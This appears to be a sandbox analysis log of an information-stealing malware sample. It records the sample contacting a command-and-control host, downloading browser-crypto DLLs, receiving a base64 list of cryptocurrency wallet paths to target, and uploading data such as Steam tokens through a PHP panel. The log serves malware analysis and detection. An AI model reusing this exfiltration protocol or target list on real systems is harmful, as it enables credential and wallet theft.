00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 26, 2024 06:00:19.709424973 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 06:00:19.926419973 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:19 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 26, 2024 06:00:20.240086079 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 06:00:20.458813906 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:20 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 26, 2024 06:00:22.193238974 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 06:00:22.422579050 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:22 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 26, 2024 06:00:22.718487978 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 06:00:23.941930056 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:22 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 26, 2024 06:00:23.952734947 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:22 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 26, 2024 06:00:24.501924992 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG Host: 185.215.113.37 Content-Length: 1003 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 06:00:25.224256039 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 06:00:25.387907982 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIDGHDBAFIJJJJKJDHD Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 37 62 34 64 61 34 32 66 33 39 38 37 34 66 65 30 66 66 32 35 61 34 38 61 36 63 61 36 61 39 35 66 37 31 64 36 38 33 63 39 33 66 64 63 34 33 63 36 37 36 32 39 62 65 37 63 30 37 33 35 32 36 33 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 48 44 42 41 46 49 4a 4a 4a 4a 4b 4a 44 48 44 2d 2d 0d 0a Data Ascii: ------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------BFIDGHDBAFIJJJJKJDHDContent-Disposition: form-data; name="message"wallets------BFIDGHDBAFIJJJJKJDHD--
Sep 26, 2024 06:00:25.744626999 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:25 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 26, 2024 06:00:25.747917891 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJ Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 37 62 34 64 61 34 32 66 33 39 38 37 34 66 65 30 66 66 32 35 61 34 38 61 36 63 61 36 61 39 35 66 37 31 64 36 38 33 63 39 33 66 64 63 34 33 63 36 37 36 32 39 62 65 37 63 30 37 33 35 32 36 33 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 2d 2d 0d 0a Data Ascii: ------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="message"ybncbhylepme------IJKFHDBKFCAAECBFIDHJ--
Sep 26, 2024 06:00:25.968451023 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:25 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 5801 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 72 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 65 67 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 69 6e 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 70 74 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 61 63 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 0a 3c 62 72 3e 2a 2e 62 64 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 2e 67 6f 6f [TRUNCATED] Data Ascii: .pl<br> 1.google.com.google.com<br>.ar<br> 1.google.com.google.com<br>.br<br> 1.google.com.google.com<br>.ec<br> 1.google.com.google.com<br>.eg<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.pt<br> 1.google.com.google.com<br>.ac<br> 1.google.com.google.com<br>.bd<br> 1.google.com.google.com<br>.zm<br> 1.google.com.google.com<br>.ve<br> 1.google.com.google.com<br>.pk<br> 1.google.com.google.com<br>.rs<br> 1.google.com.google.com<br>.ph<br> 1.google.com.google.com<br>.mx<br> 1.google.com.google.com<br>.in<br> 1.google.com.google.com<br>.th<br> 1.google.com.google.com<br>.id<br> 1.google.com.google.com<br>.tr<br> 1.google.com.google.com<br>.cz<br> 1.google.com.google.com<br>.io<br> 1.google.com.google.com<br>.dz<br> 1.google.com.google.com<br>.de<br> 1.google.com.google.com<br>.kr<br> 1.google.com.google.com<br>.ma<br> 1.google.com.google.com<br>.jp<br> 1.google.com.google.com
Sep 26, 2024 06:00:25.983572960 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 37 62 34 64 61 34 32 66 33 39 38 37 34 66 65 30 66 66 32 35 61 34 38 61 36 63 61 36 61 39 35 66 37 31 64 36 38 33 63 39 33 66 64 63 34 33 63 36 37 36 32 39 62 65 37 63 30 37 33 35 32 36 33 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="file"------HJDBFBKKJDHJKECBGDAK--
Sep 26, 2024 06:00:26.695496082 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:26 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 06:00:26.733150959 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIE Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 37 62 34 64 61 34 32 66 33 39 38 37 34 66 65 30 66 66 32 35 61 34 38 61 36 63 61 36 61 39 35 66 37 31 64 36 38 33 63 39 33 66 64 63 34 33 63 36 37 36 32 39 62 65 37 63 30 37 33 35 32 36 33 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="message"files------AFIEGCAECGCAEBFHDHIE--
Sep 26, 2024 06:00:26.952488899 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:26 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 06:00:26.953699112 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 33 36 32 64 37 62 34 64 61 34 32 66 33 39 38 37 34 66 65 30 66 66 32 35 61 34 38 61 36 63 61 36 61 39 35 66 37 31 64 36 38 33 63 39 33 66 64 63 34 33 63 36 37 36 32 39 62 65 37 63 30 37 33 35 32 36 33 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="token"14362d7b4da42f39874fe0ff25a48a6ca6a95f71d683c93fdc43c67629be7c0735263165------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HCAAEBKEGHJKEBFHJDBF--
Sep 26, 2024 06:00:27.658442020 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 04:00:27 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	00:00:04
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x3c0000
File size:	1'826'816 bytes
MD5 hash:	9BBC1DB6151E2794C605440A57BCBE4D
Has elevated privileges:	true
Has administrator privileges:	true
